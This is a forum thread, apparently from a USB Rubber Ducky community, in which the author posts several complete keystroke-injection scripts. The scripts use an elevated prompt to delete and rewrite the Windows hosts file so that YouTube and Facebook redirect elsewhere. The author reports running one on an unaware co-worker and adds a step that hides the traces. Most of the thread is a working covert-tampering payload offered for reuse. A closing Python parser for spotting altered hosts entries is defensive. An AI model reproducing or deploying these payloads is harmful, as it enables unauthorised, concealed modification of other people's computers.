TakkeX Posted April 13, 2014

Ello everyone,

I am very new with the ducky, and I am looking for some help. As I understand, powershell must be installed for any of the "Duck Toolkit" payloads to work. I was interested in DNS poisoning, but I can't get it to work correctly. I even tried to remove the command prompt section and have an administrative cmd already up and running before I plugged in my ducky. Everything went smoothly, but it still did nothing. I have disabled all my anti-virus programs and even tried a few random other DNS poisoning/host mod scripts that I randomly found on here and other websites. No luck.

Is there a way to:
1. copy "hosts.txt" (pre-created file) from my single ducky sd card to the \Windows\System32\drivers\etc folder
2. delete "hosts" file in \Windows\System32\drivers\etc folder
3. rename "hosts.txt" to just "hosts"

Please, no powershell. It seems pretty simple, but I still have no idea what I am doing.
TakkeX (Author) Posted April 15, 2014

Since no one wanted to help, I did it all myself. Can anyone clean this up a bit? I am guessing that I made this too complicated. It is designed for Win XP and Win 7.

Change hosts file (read-only) to redirect Youtube + Facebook to Google.

DELAY 3000
DEFAULT_DELAY 250
GUI r
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\
ENTER
CONTROL A
SHIFT F10
STRING R
DELAY 500
SPACE
ENTER
ENTER
DELAY 1000
LEFT
ENTER
DELAY 1000
ALT F4
GUI d
CONTROL N
ALT f
STRING W
DELAY 500
STRING S
DELAY 500
STRING CMD.EXE
ENTER
STRING COMMANDPROMPT
ENTER
DELAY 500
STRING COMMANDPROMPT
SHIFT F10
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER
ALT F4
GUI d
CONTROL N
STRING COMMANDPROMPT
DELETE
ENTER
ALT F4

Change hosts file (write access) to redirect Youtube + Facebook to Google.

DELAY 3000
DEFAULT_DELAY 250
GUI d
CONTROL N
ALT f
STRING W
DELAY 500
STRING S
DELAY 500
STRING CMD.EXE
ENTER
STRING COMMANDPROMPT
ENTER
DELAY 500
STRING COMMANDPROMPT
SHIFT F10
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER
ALT F4
GUI d
CONTROL N
STRING COMMANDPROMPT
DELETE
ENTER
ALT F4
TakkeX (Author) Posted April 17, 2014

After messing around with it a little bit, I cleaned it up. Then I successfully tested it on a lazy co-worker who surfs the net all day. :D

This is written to have caps-lock on while running (not necessary), and the first script will "clear" the run history to prevent the target from locating the problem.

Using this script the first time, the host files will be read-only. Use this:

DELAY 3000
DEFAULT_DELAY 250
GUI r
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\
ENTER
CONTROL A
SHIFT F10
STRING R
DELAY 500
SPACE
ENTER
ENTER
DELAY 1000
LEFT
ENTER
DELAY 1000
ALT F4
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
MENU
DELAY 500
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER
DELAY 500
GUI r
STRING MSCONFIG
ENTER
DELAY 750
ALT F4

After using the previous script once, the host files will be read-write. Use this:

DELAY 3000
DEFAULT_DELAY 250
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
MENU
DELAY 500
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER
TakkeX (Author) Posted April 17, 2014

On a side note, you may want to also add a third redirect to the list. The "mobile" site was still accessible, but this should clear it up. Depending on how many sites you want to redirect, the second script should take about 40 seconds.

STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
STRING 74.125.228.97 MOBILE.FACEBOOK.COM
ENTER
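A defender's counterpart to the thread above, added here and not code from any of the posts: a parser for the hosts-file format the scripts type into notepad (address in the first column, hostnames after it, `#` comments whole-line or trailing) that flags every active mapping which either redirects a name to a non-loopback address or sinkholes a non-local name on loopback or 0.0.0.0. The sample file, the `allowed` pair set and the `Finding` record are constructed for this example.

```python
import ipaddress
from typing import List, NamedTuple, Set, Tuple

# Names that legitimately live on loopback; any other name parked there is a sinkhole.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}

class Finding(NamedTuple):
    line_no: int
    hostname: str
    address: str
    reason: str  # "redirect", "sinkhole" or "bad-address"

def parse_hosts(text: str) -> List[Tuple[int, str, List[str]]]:
    """Hosts-file grammar: '#' starts a comment (whole line or trailing), the first
    column is an address, the remaining columns are hostnames for that address."""
    rows = []
    for no, raw in enumerate(text.splitlines(), 1):
        fields = raw.partition("#")[0].split()
        if fields:  # skip blank and comment-only lines
            rows.append((no, fields[0], [h.lower() for h in fields[1:]]))
    return rows

def suspicious_entries(text: str, allowed: Set[Tuple[str, str]] = frozenset()) -> List[Finding]:
    """Every active mapping that is not loopback->localhost and not in `allowed`,
    the (address, hostname) pairs an administrator knows to be legitimate."""
    findings = []
    for no, address, hostnames in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(address)
        except ValueError:  # first column is not an IP: the file was edited by hand or a script
            findings.append(Finding(no, " ".join(hostnames), address, "bad-address"))
            continue
        local_sink = addr.is_loopback or addr.is_unspecified
        for host in hostnames:
            if (address, host) in allowed or (local_sink and host in LOCAL_NAMES):
                continue
            findings.append(Finding(no, host, address, "sinkhole" if local_sink else "redirect"))
    return findings

# Constructed sample in the layout the thread's scripts type into notepad.
SAMPLE = """# Copyright (c) 1993-2009 Microsoft Corp.
# 127.0.0.1       localhost
74.125.228.97 youtube.com
74.125.228.97 facebook.com
74.125.228.97 www.facebook.com   # trailing comment
74.125.228.97 mobile.facebook.com
127.0.0.1 localhost
0.0.0.0 ads.example
"""
```

Run it against %WINDIR%\System32\drivers\etc\hosts on a schedule and diff the findings against a known-good baseline; on a stock Windows install the active section of the file is empty, so any finding at all is worth a look.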